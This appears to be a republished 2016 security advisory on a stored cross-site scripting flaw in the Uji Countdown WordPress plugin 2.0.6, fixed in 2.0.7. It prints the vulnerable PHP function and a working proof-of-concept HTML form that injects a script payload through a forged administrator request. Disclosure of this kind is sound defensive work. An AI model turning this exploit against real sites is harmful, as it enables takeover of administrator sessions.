WordPress Uji Countdown 2.0.6 Cross Site Scripting

2016.08.03
Credit: Yorick Koster
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

------------------------------------------------------------------------
Cross-Site Scripting in Uji Countdown WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Uji Countdown WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0029

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Uji Countdown WordPress Plugin version 2.0.6.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Uji Countdown version 2.0.7.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_uji_countdown_wordpress_plugin.html

The issue exists in the file /classes/class-uji-countdown-admin.php and is caused by the lack of output encoding in the ujic_tabs_values() function. Every column read from the uji_counter table (time, title, style and id) is concatenated into the admin table markup as-is: the title and time land in element content, the style in both an id attribute and element content, and the id in two href attributes.

private function ujic_tabs_values() {
    global $wpdb;
    $ujictab = '';
    $table_name = $wpdb->prefix . "uji_counter";
    $ujic_datas = $wpdb->get_results( "SELECT * FROM $table_name ORDER BY `time` DESC" );
    if ( !empty( $ujic_datas ) ) {
        foreach ( $ujic_datas as $ujic ) {
            $ujic_style = !empty( $ujic->style ) ? $ujic->style : 'classic';
            $ujic_ico = '<span id="ujic-style-' . $ujic_style . '" class="ujic-types">' . $ujic_style . '</span>';
            $ujictab .= '<tr>
                <td>' . $ujic->time . '</td>
                <td>' . $ujic->title . '</td>
                <td>' . $ujic_ico . '</td>
                <td>
                    <a href="?page=uji-countdown&tab=tab_ujic_new&edit=' . $ujic->id . '"><i class="dashicons dashicons-welcome-write-blog"></i>Edit</a> |
                    <a href="options-general.php?page=uji-countdown&del=' . $ujic->id . '"><i class="dashicons dashicons-trash"></i> Delete</a>
                </td>
            </tr>';
        }
    }
    return $ujictab;
}

In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website such as the proof of concept below. The page submits the plugin's "Save Style" form cross-site; the payload in ujic_name is stored as the countdown title and is then rendered unescaped by ujic_tabs_values() the next time an Administrator views the plugin's countdown list. Because the title is emitted as element content rather than inside an attribute, the leading "> of the payload is not required for this sink; the <script> element alone is sufficient.

Proof of concept

<html>
  <body>
    <form action="http://<target>/wp-admin/options-general.php?page=uji-countdown&tab=tab_ujic_new&style=classic&save=true" method="POST">
      <input type="hidden" name="ujic_style" value="classic" />
      <input type="hidden" name="ujic_name" value="&quot;><script>alert(1);</script>" />
      <input type="hidden" name="ujic_goof" value="ABeeZee" />
      <input type="hidden" name="ujic_pos" value="center" />
      <input type="hidden" name="ujic_d" value="true" />
      <input type="hidden" name="ujic_h" value="true" />
      <input type="hidden" name="ujic_m" value="true" />
      <input type="hidden" name="ujic_s" value="true" />
      <input type="hidden" name="ujic_txt" value="true" />
      <input type="hidden" name="ujic_size" value="32" />
      <input type="hidden" name="ujic_col_dw" value="#a61ba6" />
      <input type="hidden" name="ujic_col_up" value="#c368c3" />
      <input type="hidden" name="ujic_col_txt" value="#ffffff" />
      <input type="hidden" name="ujic_col_sw" value="#000000" />
      <input type="hidden" name="ujic_col_lab" value="#000000" />
      <input type="hidden" name="ujic_lab_sz" value="13" />
      <input type="hidden" name="ujic_subscrFrmWidth" value="100" />
      <input type="hidden" name="ujic_subscrFrmAboveText" value="Join Our Newsletter" />
      <input type="hidden" name="ujic_subscrFrmInputText" value="Enter your email here" />
      <input type="hidden" name="ujic_subscrFrmSubmitText" value="Subscribe" />
      <input type="hidden" name="ujic_subscrFrmSubmitColor" value="#ab02b2" />
      <input type="hidden" name="ujic_subscrFrmThanksMessage" value="Thanks for subscribing" />
      <input type="hidden" name="ujic_subscrFrmErrorMessage" value="Invalid email address" />
      <input type="hidden" name="submit_ujic" value="Save Style" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its goal is to contribute to the security of popular, widely used OSS projects in a fun and educational way.


Copyright 2024, cxsecurity.com